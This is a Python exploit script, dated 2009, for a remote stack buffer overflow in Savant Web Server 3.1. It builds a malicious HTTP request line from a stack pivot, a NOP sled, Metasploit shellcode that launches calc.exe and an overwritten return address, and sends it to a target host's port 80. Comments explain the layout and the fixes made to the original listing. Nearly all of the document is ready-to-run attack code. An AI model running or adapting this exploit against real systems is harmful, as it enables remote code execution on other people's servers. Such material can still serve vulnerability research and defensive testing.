Savant Web Server 3.1 Remote Buffer Overflow Exploit

Date: 2009-12-14 — Author: DouBle_Zer0
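#!/usr/bin/python
"""Savant Web Server 3.1 remote stack buffer overflow -- calc.exe proof of concept.

Usage: python savant_31_bof.py <host>

Original author: DouBle_Zer0 (2009-12-14). Vulnerability discovered by Muts
(Offensive Security). The author reports it tested against Windows XP SP2/SP3
(English); the return address below is specific to that savant.exe build and
will need re-checking on anything else.

Request layout, taken from the original listing's notes:

* The request line opens with five raw opcode bytes, ``add esp,0x50 ; push esp ;
  ret``, followed by ``" /"``.  The saved return address is overwritten with
  0x00401D09 (``pop ebp ; ret`` in savant.exe), which the notes describe as a
  "double dance": the gadget returns into the start of the request buffer,
  the ``add esp,0x50 ; push esp ; ret`` there then pivots into the NOP sled and
  shellcode that follow.  The exact pivot path is inferred from those notes --
  confirm in a debugger before relying on it.
* Only the three low bytes of the return address are sent.  The fourth byte
  (0x00) is presumably supplied by the server when it terminates the request
  line in place -- TODO confirm against the target binary; sending a literal
  NUL would truncate the request.
* The original listing ends the request with two bare LFs rather than the
  CRLF pairs HTTP specifies; Savant evidently accepted that on the tested
  hosts.  If a target rejects the request, try ``b"\\r\\n\\r\\n"`` first.

The listing as published had lost the backslashes from its escape sequences
(``x31xc9...``); they are restored here, and the byte counts match the
original comments (172-byte shellcode, 83 bytes of NOP padding).  Bytes
literals are used so the script runs unchanged under Python 2.6+ and 3.
"""

import socket
import sys

TARGET_PORT = 80

# Metasploit "Windows exec calc.exe" payload, 172 bytes (count matches the
# original listing's comment).
SHELLCODE = (
    b"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
    b"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
    b"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
    b"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
    b"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
    b"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
    b"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
    b"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
    b"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
    b"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
    b"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"
)

# "add esp,0x50 ; push esp ; ret" -- executed once the pop ebp/ret gadget
# returns into the request buffer (see module docstring).
STACK_PIVOT = b"\x83\xC4\x50\x54\xc3"

# The original listing used two sleds of 53 and 30 NOPs.  The total (83) is
# what positions the return address over the saved EIP, so keep it intact.
NOP_SLED = b"\x90" * (53 + 30)

# 0x00401D09 in savant.exe: pop ebp ; ret.  Little-endian, low three bytes
# only -- the high 0x00 is assumed to come from the server's own string
# termination (TODO confirm).
RET_ADDR = b"\x09\x1D\x40"

# Two bare LFs, exactly as in the original listing (not RFC-compliant CRLF).
REQUEST_TERMINATOR = b"\n\n"


def build_request():
    """Return the complete malicious request line as bytes.

    Layout: STACK_PIVOT + b" /" + NOP_SLED + SHELLCODE + RET_ADDR +
    REQUEST_TERMINATOR.  Pure function; nothing is sent.
    """
    return b"".join((
        STACK_PIVOT,
        b" /",
        NOP_SLED,
        SHELLCODE,
        RET_ADDR,
        REQUEST_TERMINATOR,
    ))


def main(argv=None):
    """Build the request, echo it, and send it to <host>:80.

    Args:
        argv: argument vector; defaults to ``sys.argv``.  ``argv[1]`` is the
            target host.

    Returns:
        Process exit status: 0 on a completed send, 2 on usage error.

    Raises:
        socket.error / OSError if the connection or send fails -- surfaced
        deliberately so a failed attempt is not mistaken for success.
    """
    if argv is None:
        argv = sys.argv
    if len(argv) != 2:
        sys.stderr.write("usage: %s <host>\n" % argv[0])
        return 2
    host = argv[1]

    request = build_request()
    # repr() keeps the echo readable and identical across Python 2 and 3;
    # the original printed the raw bytes to the terminal.
    print(repr(request))

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Don't hang forever on a filtered or dead host.
    sock.settimeout(10)
    try:
        sock.connect((host, TARGET_PORT))
        # sendall() retries partial writes; the original send() could silently
        # deliver a truncated buffer and misalign the return address.
        sock.sendall(request)
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())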
